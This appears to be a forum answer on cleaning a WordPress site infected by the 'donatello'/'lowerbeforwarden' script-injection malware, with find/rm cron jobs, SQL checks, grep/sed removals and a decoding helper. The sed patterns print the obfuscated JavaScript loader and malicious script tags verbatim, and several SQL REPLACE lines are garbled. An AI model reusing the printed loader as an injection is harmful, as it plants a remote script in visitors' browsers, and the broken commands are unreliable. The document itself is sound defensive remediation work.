mysql — How to bulk-remove a specific part of all posts in WordPress

  • August 12, 2020


This is my list of commands for Linux CentOS:

1. Remove the malicious scripts

find /var/www/ -type f -name "_a" -exec rm -f "{}" +;
find /var/www/ -type f -name "_t" -exec rm -f "{}" +;

Put this command in cron to keep the server clean (remove the malicious files every 15 minutes if they are on the server):

# execute every 15 minutes
*/15 * * * *  find /var/www/ -type f -name "rms_unique_wp_mu_pl_fl_nm.php" -exec rm -f "{}" +; find /var/www/ -type f -name "rms-script-ini.php" -exec rm -f "{}" +; find /var/www/ -type f -name "rms-script-mu-plugin.php" -exec rm -f "{}" +; find /var/www/ -type f -name "_a" -exec rm -f "{}" +; find /var/www/ -type f -name "_t" -exec rm -f "{}" +;

2. Clear the WP plugin cache

3. Clean the DB

Use this SQL query:

#check affected records
SELECT * FROM wp_posts WHERE post_content LIKE "%donatello%";
SELECT * FROM wp_posts WHERE post_content LIKE "%blackwater%";
SELECT * FROM wp_options WHERE option_value LIKE "%donatello%";
SELECT * FROM wp_options WHERE option_value LIKE "%blackwater%";
SELECT * FROM wp_posts WHERE post_content LIKE "%directednotconverted%";
SELECT * FROM wp_options WHERE option_value LIKE "%directednotconverted%";
SELECT * FROM wp_posts WHERE post_content LIKE "%lowerbeforwarden%";
SELECT * FROM wp_options WHERE option_value LIKE "%lowerbeforwarden%";
    

#clean db
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src=" type="text/javascript"></script>", ''));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script type="text/javascript" src=" ''));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src=" type="text/javascript"></script>", ''));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src=""" type=""text/javascript""></script>", ''));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src=" type="text/javascript"></script>", ''));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src=""" type=""text/javascript""></script>", ''));


#recheck if all is clean
SELECT * FROM wp_posts WHERE post_content LIKE "%donatello%";
SELECT * FROM wp_posts WHERE post_content LIKE "%blackwater%";
SELECT * FROM wp_options WHERE option_value LIKE "%donatello%";
SELECT * FROM wp_options WHERE option_value LIKE "%blackwater%";
SELECT * FROM wp_posts WHERE post_content LIKE "%directednotconverted%";
SELECT * FROM wp_options WHERE option_value LIKE "%directednotconverted%";
SELECT * FROM wp_posts WHERE post_content LIKE "%lowerbeforwarden%";
SELECT * FROM wp_options WHERE option_value LIKE "%lowerbeforwarden%";

4. Check for and clean malicious code in files

Check for malicious code in plain text:

cd /var/www
grep -rlF "donatello"
grep -rlF "blackwater"
grep -rlF "lowerbeforwarden"

Clean the code injected as plain text:

grep -rlF "donatello" | xargs sed -i 's/<script type="text\/javascript" src="https:\/\/js.donatelloflowfirstly.ga\/statistics.js?n=nb5"><\/script>//g'
grep -rlF "lowerbeforwarden" | xargs sed -i 's/<script type="text\/javascript" src="https:\/\/scripts.lowerbeforwarden.ml\/src.js?n=nb5"><\/script>//g'

Check for encrypted malicious code. If you convert the numeric sequence

String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115)

to UTF-8, you will see:

h,t,t,p,s,:,/,/,s,c,r,i,p,t,s,.,l,o,w,e,r,b,e,f,o,r,w,a,r,d,e,n,.,m,l,/,s,r,c,.,j,s

I found the code:

grep -rlF "String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115)"

Remove the code:

grep -rlF "String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115)" | xargs sed -i "s/<script type=text\/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))\[0\]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0\]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0\].appendChild(elem);})();<\/script>//g"
grep -rlF "String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115)" | xargs sed -i "s/Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))\[0\]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0\]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0\].appendChild(elem);})();//g"

The last encrypted string is associated with the "lowerbeforwarden" variant. Use the appropriate sequence for "donatello".

I hope this helps.
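
The numeric strings above are plain character codes, so a whole tree can be decoded before any grep or sed pattern is written for a new variant. This is an added example, not part of the original answer: `decode_charcodes`, `scan_tree` and `make_sample` are hypothetical helper names, and the sample file is constructed from a shortened form of the loader quoted above.

```shell
# Added example (not from the original answer): decode String.fromCharCode(...)
# literals so that hidden script URLs show up in plain text.

# stdin: file contents; stdout: one decoded string per String.fromCharCode(...) call.
decode_charcodes() {
  grep -oE 'String\.fromCharCode\([0-9, ]+\)' |
    sed -E 's/^String\.fromCharCode\(//; s/\)$//' |
    awk -F',' '{
      s = ""
      for (i = 1; i <= NF; i++) {
        n = $i + 0
        # Keep printable ASCII only; any other code is shown as "?"
        s = s ((n >= 32 && n <= 126) ? sprintf("%c", n) : "?")
      }
      print s
    }'
}

# Print "file<TAB>decoded string" for every decoded literal that contains a URL.
# Runs in a subshell; file names containing newlines are not handled.
scan_tree() (
  grep -rlF 'String.fromCharCode(' -- "$1" |
    while IFS= read -r file; do
      decode_charcodes < "$file" | sort -u |
        while IFS= read -r decoded; do
          case $decoded in
            *http://*|*https://*) printf '%s\t%s\n' "$file" "$decoded" ;;
          esac
        done
    done
)

# Constructed sample tree: one file with a shortened copy of the loader, one clean file.
make_sample() {
  mkdir -p "$1/theme"
  cat > "$1/theme/header.php" <<'EOF'
<script type=text/javascript>var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115);</script>
EOF
  echo '<?php echo "clean"; ?>' > "$1/theme/index.php"
}
```

Run `scan_tree /var/www` to list every file that carries a character-code literal decoding to a URL; the decoded host is the string to use in the SQL `LIKE` checks and the `grep -rlF` searches above.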
